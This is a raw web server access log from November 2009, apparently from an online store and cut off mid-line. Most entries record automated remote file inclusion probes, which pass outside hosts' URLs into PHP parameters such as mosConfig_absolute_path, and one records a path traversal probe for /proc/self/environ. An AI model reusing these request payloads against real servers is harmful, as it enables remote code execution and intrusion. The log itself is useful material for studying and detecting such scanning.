200.234.200.157 - - [26/Nov/2009:06:22:11 -0500] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 240 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
123.125.66.125 - - [26/Nov/2009:06:22:20 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
174.142.75.77 - - [26/Nov/2009:06:22:32 -0500] "GET //class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:22:32 -0500] "GET /logs//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
220.181.7.66 - - [26/Nov/2009:06:23:02 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
174.142.75.77 - - [26/Nov/2009:06:23:56 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:23:56 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:23:56 -0500] "GET /logs/access_log.Q109102900//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:06:24:12 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.142.75.77 - - [26/Nov/2009:06:24:16 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:24:16 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:24:16 -0500] "GET /logs/access_log.Q109102900//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:24:24 -0500] "GET //class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:24:24 -0500] "GET /logs//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
116.226.69.10 - - [26/Nov/2009:06:24:29 -0500] "GET / HTTP/1.1" 200 409 "http://www.google.com/search?client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&channel=s&hl=en&source=hp&q=ACE+online+store&btnG=Google+Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
116.226.69.10 - - [26/Nov/2009:06:24:30 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
174.142.75.77 - - [26/Nov/2009:06:24:31 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:24:31 -0500] "GET /logs/access_log.Q109102900//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.226.69.10 - - [26/Nov/2009:06:24:32 -0500] "GET /ACE.html HTTP/1.1" 200 5877 "http://www.aceonlinestore.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
116.226.69.10 - - [26/Nov/2009:06:24:33 -0500] "GET /images/login.gif HTTP/1.1" 200 166 "http://www.aceonlinestore.com/ACE.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
116.226.69.10 - - [26/Nov/2009:06:24:33 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
116.226.69.10 - - [26/Nov/2009:06:24:33 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/ACE.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
116.226.69.10 - - [26/Nov/2009:06:24:33 -0500] "GET /images/search.gif HTTP/1.1" 200 614 "http://www.aceonlinestore.com/ACE.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
116.226.69.10 - - [26/Nov/2009:06:24:33 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/ACE.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
174.142.75.77 - - [26/Nov/2009:06:24:33 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.131.226.52 - - [26/Nov/2009:06:24:34 -0500] "GET /errors.php?error=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.131.226.52 - - [26/Nov/2009:06:24:34 -0500] "GET /logs/errors.php?error=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.131.226.52 - - [26/Nov/2009:06:24:34 -0500] "GET /logs/access_log.Q109093000%20%20/errors.php?error=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:24:59 -0500] "GET /logs/access_log.Q109082000//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
174.142.75.77 - - [26/Nov/2009:06:24:59 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
174.142.75.77 - - [26/Nov/2009:06:25:08 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:25:13 -0500] "GET /logs/access_log.Q109102900//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:25:26 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:25:41 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.142.75.77 - - [26/Nov/2009:06:25:41 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.142.75.77 - - [26/Nov/2009:06:25:45 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:25:45 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:25:49 -0500] "GET /logs/access_log.Q109102900//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:25:58 -0500] "GET //class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:25:58 -0500] "GET /logs//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:26:26 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:26:30 -0500] "GET /logs/access_log.Q109102900//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:26:31 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:26:42 -0500] "GET /logs/access_log.Q109082000//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.142.75.77 - - [26/Nov/2009:06:26:42 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.142.75.77 - - [26/Nov/2009:06:26:42 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.142.75.77 - - [26/Nov/2009:06:27:18 -0500] "GET /logs/access_log.Q109082000//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
174.142.75.77 - - [26/Nov/2009:06:27:22 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
66.249.65.67 - - [26/Nov/2009:06:27:29 -0500] "GET /images/items/index4_hose_over.jpg HTTP/1.1" 200 2682 "-" "Googlebot-Image/1.0"
222.236.221.47 - - [26/Nov/2009:06:27:42 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://curztech.com/zaph0d/readme.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
222.236.221.47 - - [26/Nov/2009:06:27:42 -0500] "GET /lostpasswd.php?env[include_prefix]=http://curztech.com/zaph0d/readme.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:27:50 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.142.75.77 - - [26/Nov/2009:06:27:50 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.142.75.77 - - [26/Nov/2009:06:27:54 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.142.75.77 - - [26/Nov/2009:06:27:54 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.142.75.77 - - [26/Nov/2009:06:28:30 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
174.142.75.77 - - [26/Nov/2009:06:28:35 -0500] "GET /logs/access_log.Q109082000//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
174.142.75.77 - - [26/Nov/2009:06:28:58 -0500] "GET /logs/access_log.Q109050800//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
209.59.12.99 - - [26/Nov/2009:06:29:12 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.142.75.77 - - [26/Nov/2009:06:30:19 -0500] "GET /logs/error_log.Q109110100//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.142.75.77 - - [26/Nov/2009:06:30:35 -0500] "GET /logs/access_log.Q109110600%20%20//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
78.110.50.132 - - [26/Nov/2009:06:30:50 -0500] "GET /?DOCUMENT_ROOT=http://www.hitradio1.com/stem1458/imsid.txt%0D?? HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
78.110.50.132 - - [26/Nov/2009:06:30:49 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.hitradio1.com/stem1458/imsid.txt%0D?? HTTP/1.1" 200 27548 "-" "libwww-perl/5.831"
174.142.75.77 - - [26/Nov/2009:06:30:52 -0500] "GET /logs/access_log.Q109110600%20%20//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:30:54 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
174.142.75.77 - - [26/Nov/2009:06:30:55 -0500] "GET /logs/error_log.Q109110100//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
174.142.75.77 - - [26/Nov/2009:06:31:01 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:31:01 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:31:01 -0500] "GET /logs/error_log.Q109081300%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:31:20 -0500] "GET /logs/error_log.Q109110100//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
174.142.75.77 - - [26/Nov/2009:06:31:44 -0500] "GET /logs/access_log.Q109102900%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:31:56 -0500] "GET /logs/access_log.Q109102900%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:32:18 -0500] "GET /logs/error_log.Q109081300%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:32:31 -0500] "GET /logs/error_log.Q109081300%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:33:20 -0500] "GET /logs/access_log.Q109102900%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:33:50 -0500] "GET /logs/error_log.Q109081300%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:06:34:12 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.142.75.77 - - [26/Nov/2009:06:34:33 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:34:33 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:34:33 -0500] "GET /logs/error_log.Q109081300%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:34:56 -0500] "GET /logs/access_log.Q109110600%20%20//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:35:12 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:35:12 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:35:12 -0500] "GET /logs/error_log.Q109081300%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.200.255.18 - - [26/Nov/2009:06:35:15 -0500] "GET /logs/access_log.Q109070500%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
193.200.255.18 - - [26/Nov/2009:06:35:16 -0500] "GET /logs/error_log.Q109101300%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
193.200.255.18 - - [26/Nov/2009:06:35:16 -0500] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
193.200.255.18 - - [26/Nov/2009:06:35:16 -0500] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.74.146.178 - - [26/Nov/2009:06:35:28 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
193.200.255.18 - - [26/Nov/2009:06:35:43 -0500] "GET /logs/access_log.Q109082000/phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.200.255.18 - - [26/Nov/2009:06:35:43 -0500] "GET /phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
193.200.255.18 - - [26/Nov/2009:06:35:46 -0500] "GET /logs/phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.7.173.20 - - [26/Nov/2009:06:36:01 -0500] "GET /?DOCUMENT_ROOT=http://www.hitradio1.com/stem1458/imsid.txt%0D?? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
216.7.173.20 - - [26/Nov/2009:06:36:01 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.hitradio1.com/stem1458/imsid.txt%0D?? HTTP/1.1" 200 27548 "-" "libwww-perl/5.79"
117.74.98.18 - - [26/Nov/2009:06:36:28 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
117.74.98.18 - - [26/Nov/2009:06:36:28 -0500] "GET /logs/error_log.Q109110500%20%20//oneadmin/config.php?path[docroot]=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:36:28 -0500] "GET /logs/access_log.Q109110600%20%20//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
117.74.98.18 - - [26/Nov/2009:06:36:29 -0500] "GET //oneadmin/config.php?path[docroot]=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:36:30 -0500] "GET /logs/access_log.Q109110600%20%20//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:36:37 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:36:44 -0500] "GET /logs//index.php?option=com_virtuemart&